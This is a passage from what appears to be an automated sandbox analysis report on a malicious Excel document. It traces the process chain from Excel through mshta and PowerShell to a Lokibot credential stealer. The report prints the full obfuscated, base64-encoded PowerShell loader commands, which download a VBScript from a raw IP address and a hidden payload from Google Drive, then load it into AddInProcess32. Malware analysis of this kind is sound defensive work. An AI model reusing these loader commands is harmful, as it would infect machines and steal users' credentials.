2024-10-24 19:23:06 UTC	1324	IN	Data Raw: 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b Data Ascii: I@~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)\|jXmsf9 `we!6q{PG\|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK\|z>8Eq#}
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(
2024-10-24 19:23:06 UTC	1378	IN	Data Raw: 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 Data Ascii: $gbj60Y)V,0js?>F&g1<o7h\|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&Uk(5-TzZe0EDgO8)F@z:N]LV,hRO-Tt

Target ID:	0
Start time:	15:22:13
Start date:	24/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f100000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:22:36
Start date:	24/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13f300000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:22:43
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
Imagebase:	0x13f0f0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:22:48
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
Imagebase:	0x13f0f0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:22:51
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
Imagebase:	0x13f4b0000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:22:51
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP"
Imagebase:	0x13f140000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:22:57
Start date:	24/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
Imagebase:	0xffbf0000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:22:57
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x13f0f0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:22:57
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'\|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
Imagebase:	0x13f0f0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:23:23
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xb70000
File size:	42'056 bytes
MD5 hash:	EFBCDD2A3EBEA841996AEF00417AA958
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000010.00000002.621074045.0000000000900000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: mshta.exePID: 3868, Parent PID: 564COMMON

Executed Functions

Function 02AF0FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.417424395.0000000002AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_2af0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: e399129e48a0335aaac0554db5bea46f3af7e3dff27cdb45dc64c7837d9b8ee2
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
